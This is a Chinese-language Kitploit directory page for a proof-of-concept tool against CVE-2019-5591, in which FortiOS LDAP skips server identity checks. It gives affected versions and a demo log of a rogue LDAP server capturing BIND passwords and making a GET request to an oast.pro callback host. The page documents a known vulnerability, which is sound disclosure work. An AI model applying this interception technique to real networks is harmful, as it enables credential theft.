Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
fortios-ldap-mitm-poc-CVE-2019-5591 — FortiOS v6.0.x 至 v6.2.0 上 LDAP 的默认配置不对 LDAP/S 检查服务器身份,从而导致 MITM 攻击。该 PoC 演示了如何完全窃取在本地子网上发送到 LDAP 服务器的凭证,而该服务器极易被冒充。 | Kitploit
工具/GitHubGitHub/ayewo/fortios-ldap-mitm-poc-cve-2019-5591
漏洞分析漏洞利用信息收集网络安全渗透测试身份验证
GitHubayewo/fortios-ldap-mitm-poc-cve-2019-5591

fortios-ldap-mitm-poc-CVE-2019-5591

FortiOS v6.0.x 至 v6.2.0 上 LDAP 的默认配置不对 LDAP/S 检查服务器身份,从而导致 MITM 攻击。该 PoC 演示了如何完全窃取在本地子网上发送到 LDAP 服务器的凭证,而该服务器极易被冒充。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1210个月前尚未审核
分享

CVE-2019-5591

此概念验证(PoC)演示了一种 MITM(中间人)攻击:在运行易受攻击版本 FortiOS 的 FortiGate 设备的本地子网上冒充 LDAP 服务器。

受影响的版本

以下版本存在漏洞:

版本是否受影响解决方案
FortiOS 7.0
不受影响
不适用
FortiOS 6.06.0.3 至 6.2.0升级至 6.2.1 或更高版本

检测演示

本次 PoC 使用了在 VMware Fusion 中运行的 FortiOS 6.2.0。

root@kitploit:~

[2025-10-16 22:59:47.366765] New connection from 192.168.43.24:54789

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
nLBkcjDTHC01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro

🔑 CAPTURED PASSWORD: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔧 No scheme found — prepending https:// -> https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
📡 Attempting GET request to: https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 22:59:49.159193] Connection closed from 192.168.43.24:54789

============================================================
SESSION SUMMARY - Captured Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
============================================================

描述

FortiOS v6.0.x 至 v6.2.0 的 LDAP 默认配置不会校验 LDAP/S 的服务器身份,从而导致 MITM 攻击。此 PoC 演示了在本地子网上发送到极易被冒充的 LDAP 服务器的凭据被完整外泄的过程。

下载工具